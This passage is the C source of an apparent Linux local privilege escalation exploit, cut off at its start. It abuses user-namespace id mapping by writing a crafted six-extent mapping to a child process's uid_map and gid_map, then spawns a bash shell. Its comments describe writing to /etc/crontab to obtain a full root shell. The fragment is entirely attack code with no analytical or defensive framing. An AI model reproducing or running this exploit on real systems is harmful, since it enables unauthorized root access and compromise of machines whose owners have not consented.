        err(1, "fork");
    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");

        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of the child's /proc directory
    sprintf(pbuf, "/proc/%d", (int)child);

    // cd to /proc/<pid> so uid_map and gid_map can be opened by name
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);
    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}
05-09 00:37